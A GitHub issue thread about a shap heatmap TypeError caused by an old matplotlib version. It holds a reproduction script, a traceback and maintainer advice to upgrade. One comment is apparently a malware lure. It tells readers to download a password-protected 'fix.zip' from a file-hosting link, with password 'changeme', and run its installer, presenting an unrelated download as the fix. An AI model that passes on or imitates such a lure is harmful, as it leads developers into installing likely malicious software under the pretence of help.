### ISSUE TITLE
BUG: TypeError: set_ticks() got an unexpected keyword argument 'fontsize'

### ISSUE THREAD

**Issue by cgm814** [shap/shap#3826]
### Issue Description

I don't understand why there is an error.help,helphelp!!!

### Minimal Reproducible Example

```python
import shap
import matplotlib.pyplot as plt
plt.rc('font', family='SimHei', size=13)
..........
........
# SHAP热图（Heatmap）

print(shap_values_test.shape)

# 创建 shap.Explanation 对象
shap_explanation = shap.Explanation(values=shap_values_test[0:200,:], 
                                    base_values=explainer.expected_value, 
                                    data=X_test.iloc[0:200,:], feature_names=X_test.columns)
# 绘制热图
shap.plots.heatmap(shap_explanation)
```

### Traceback

```shell
(200, 5)
---------------------------------------------------------------------------
TypeError                                 Traceback (most recent call last)
~\AppData\Local\Temp\ipykernel_109660\2820515570.py in <module>
      8                                     data=X_test, feature_names=X_test.columns)
      9 # 绘制热图
---> 10 shap.plots.heatmap(shap_explanation)

D:\python3.7\lib\site-packages\shap\plots\_heatmap.py in heatmap(shap_values, instance_order, feature_values, feature_order, max_display, cmap, show, plot_width)
    129         [-1.5, *heatmap_yticks_pos],
    130         [r"$f(x)$", *heatmap_yticks_labels],
--> 131         fontsize=13,
    132     )
    133     # remove the y-tick line for the f(x) label

TypeError: set_ticks() got an unexpected keyword argument 'fontsize'
```

### Expected Behavior

no error

### Bug report checklist

- [X] I have checked that this issue has not already been reported.
- [X] I have confirmed this bug exists on the [latest release](https://github.com/shap/shap/releases) of shap.
- [ ] I have confirmed this bug exists on the [master branch](https://github.com/shap/shap/blob/master/CONTRIBUTING.md#installing-from-the-master-branch) of shap.
- [ ] I'd be interested in making a PR to fix this bug

### Installed Versions

0.44.1

**Comment by MoonShadowIllusion** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by wliu0218** [comment]
try, matplotlib version 3.7.0

**Comment by connortann** [comment]
That parameter is supported from matplotlib `3.5.0` and onwards, so please update your dependencies to solve this issue. Please do let us know if you encounter any issues with recent versions of shap and matplotlib.

**Comment by cgm814** [comment]
ok，已经解决了

**Comment by cgm814** [comment]
> 该参数从 matplotlib 开始受支持，因此请更新您的依赖项以解决此问题。如果您在使用最新版本的 shap 和 matplotlib 时遇到任何问题，请告诉我们。`3.5.0`

谢谢

**Comment by evgeny-ydsc** [comment]
I have the same problem.
matplotlib 3.5.0, 3.560, 3.7.0  were tried - this hasn't helped
